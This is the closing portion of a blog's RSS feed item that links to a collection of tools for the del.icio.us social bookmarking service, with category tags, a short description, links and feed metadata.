		<category><![CDATA[delicious/delicious_keywords]]></category>
		<category><![CDATA[delicious/tags]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[tutorials]]></category>

	<!-- AutoMeta Start -->
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=83</guid>
		<description><![CDATA[del.icio.us is a very popular social bookmarks manager. This is possibly the largest collection of tools related to del.icio.us and is constantly updated.
read more&#160;&#124;&#160;digg story
]]></description>
			<content:encoded><![CDATA[<p>del.icio.us is a very popular social bookmarks manager. This is possibly the largest collection of tools related to del.icio.us and is constantly updated.</p>
<p><a href="http://pchere.blogspot.com/2005/02/absolutely-delicious-complete-tool.html">read more</a>&nbsp;|&nbsp;<a href="http://digg.com/technology/Absolutely_Del.icio.us_-_Complete_Tool_Collection">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=83&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/absolutely-delicious-complete-tool-collection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
